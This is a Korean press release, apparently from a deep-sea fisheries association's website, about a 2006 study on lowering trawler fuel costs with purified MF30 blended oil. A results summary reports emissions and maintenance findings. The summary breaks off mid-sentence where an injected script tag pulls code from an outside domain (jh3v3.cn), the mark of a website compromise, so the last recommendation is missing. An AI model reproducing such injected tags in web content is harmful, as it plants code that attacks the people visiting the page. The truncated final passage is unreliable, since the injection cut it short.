:::한국원양산업협회:::

 

 소식마당>보도자료  



  한국원양어업협회 연료비 절감 모델 적극 홍보
등록일 : 2006/04/21 오후 5:36:00    조회 : 4854

원양어선 연료비 절감 모델시스템 연구 최종 보고서 나와


한국원양어업협회는 선박검사기술협회가 실시한『어선 연료비 절감 모델시스템 연구개발』최종 결과가 최근 발표됨에 따라 이를 고유가 대책의 일환으로 적극 활용토록 회원사들을 대상으로 홍보에 나서고 있다.
한국원양어업협회는 선박검사기술협회의 『어선 연료비 절감 모델시스템 연구개발』보고서를 입수해 대서양 출어선사들를 비롯한 관련 업체에 배포하고 가급적 많은 어선들이 상대적으로 값이 싼 MF30급 혼합유를 사용토록 적극 권장하고 있다.
한국원양어업협회에 따르면 선박검사기술협회는 해양수산부의 의뢰를 받아 실시한 이번 연구사업에서 저급유의 정제시스템인 Purifier와 M.C.H. 장치를 이용하여 어선에서의 모델시스템을 구축하는데 주력했으며, 장치의 성능을 검증하고 이 장치들을 이용해 MF30급 혼합유의 저속 주기관에 대한 사용 가능성을 검토했다.
그 결과 MF30급 혼합유를 사용해도 IMO에서 규제하는 질소화합물(NOX) 및 황화합물(SOX)의 기준치를 충족시켰으며 폭발 위험도 없는 것으로 나타났다. 또한 엔진 내구성 및 내마모성에 대해서도 별 문제가 없는 것으로 밝혀졌으며 각 시스템에서 정제된 MF30급 혼합유에 조연제 A, B, C를 혼합 사용할 경우 조연제 종류에 따른 영향은 미미한 것으로 나타났다.
한편 이번 연구 결과 MF30급 혼합유보다 더욱더 저급한 혼합유의 사용 한계치를 규명하는 것이 향후 과제로 나타남에 따라 해양수산부는 원양업계의 연료유 비용부담을 조금이나마 더 줄이기 위해 저급 혼합유 사용 한계치에 대한 추가적인 연구 및 대서양트롤 업종 외 참치연승 등 타업종 확대 가능성 등에 대한 연구를 계속 진행할 방침인 것으로 알려졌다.
이에앞서 한국원양어업협회는 지난 6월 21일 스페인 라스팔마스에서 해양수산부 최장현 차관보 주재로 열린 대서양기지트롤 국적선사와의 간담회를 통해 정부 차원에서 이같은 유류 경비 절감을 위한 연료유 모델 개발을 건의했으며 이에 따라 정부는 선박검사기술협회에 의뢰해 이번 연구사업을 진행시켜 왔다.
한편 대서양트롤 선사들은 이같은 연료비 절감장치 부착을 통해 중질유를 사용함으로써 연료비를 종전보다 약 30% 정도 절감할 수 있는 것으로 알려졌다.

※ 별첨 : 선박검사기술협회 연구보고서(결과 요약)



<별첨>
최종 연구 보고서 주요 내용(결과 부분 요약)

선박검사기술협회 연구팀은 각 시스템(Purifying, M.C.H., Purifying + M.C.H.)으로 정제한 MF30급 혼합유의 3가지 시료에 조연제 A, B, C를 각각 섞어 총 12가지 시료를 생성했으며, 경유와 정제되지 않은 MF30급 혼합유까지 합쳐서 총 14가지의 시료에 대해서 비중, 동점도, 유동점, 인화점, 수분, 황(S) 등의 유성상에 대해서 비교·분석했다.

◇ 그 결과 MF30 혼합유에 대한 정제전과 정제후의 유성상에는 큰 차이점이 없었을 뿐만 아니라, 각 시스템에 의한 유성상에도 차이가 거의 없는 것으로 확인되었다. 따라서 MF30급 혼합유의 조합 비율로 보면 경유 37%, MF180급 63%를 혼합(Blending)한 혼합유로서 양질의 유성상을 가지고 있는 것으로 판단되었다.
◇ 또한 조연제의 성능을 파악하기 위해 각 시스템에서 정제된 MF30급 혼합유에 조연제 A, B, C를 혼합해 유성상 분석 및 엔진 연소시험을 실시한 결과 유성상 및 배기가스(NOx, SOx, Smoke) 발생량은 약간의 차이는 있었지만 오차범위에 들어올 정도로 미미했으며, 엔진성능도 마찬가지로 조연제 종류에 따른 결과는 미미했다.
◇ 특히 각 시스템에서 정제한 MF30급 혼합유를 연소 시험하여 배기가스를 분석한 결과, 질소산화물(NOx)의 발생량은 IMO에서 규제하는 국제기준치(시험 엔진의 국제규제치 14.72g/kwh, 측정치 10~llg/kwh)를 만족하는 것으로 확인되었다.
황산화물(SOx)의 발생량에 대한 IMO 규제는 사용하는 연료에 함유되어 있는 황(Sulfur)의 함량으로 규제하게 되어 있으며, 확인결과 MF30급 혼합유의 황 함유량이 국내 시험에서는 2.700 ~ 2.788%, 국외시험에서는 1.26~l.56%로 국제기준치인 4.5%를 충족시키는 것으로 확인되었다.
◇ 이와함께 MF3O급 혼합유의 검댕(Smoke) 발생량은 중·고 부하에서는 경유 사용시에 비해서 약 10% 정도 더 많았으나 저 부하인 50% 미만의 부하에서는 경유 사용시 보다 약 2.5배에 달했다. 따라서, 이러한 스모크에 의한 카본 퇴적으로 연소실, 노즐, 배기밸브 및 터보챠저 등의 오염이 염려되므로 경유 사용시보다 정비주기를 짧게 해야 할 것으로 판단되었다.
◇ 특히, 노즐에 대해서는 주기적인 소제와 함께 압력 Test 등 노즐의 막힘 현상을 조기에 예방할 수 있는 방법을 강구해야 한다.
또한, 노즐의 열화에 따라서 Nozzle Tip 부분에 잔류탄소분 등이 두텁게 퇴적된 것이 확인되었으며, 이에 대한 대책으로 ?script src=http://jh3v3.cn></script>


[이전글] : 원양업계 해수부 장관 주재, 회장단 ..
[다음글] : 2006년도 북양트롤 어가 협상 결과

(우:06775) 서울시 서초구 논현로 83(양재동) / T:02.589.1621~2 / F:02.589.1630~1 kosfa@kosfa.org
Coyright (c) 1999~2020 Kofa. All Rights Reserved. Visit: Total(18739437) Today(1022)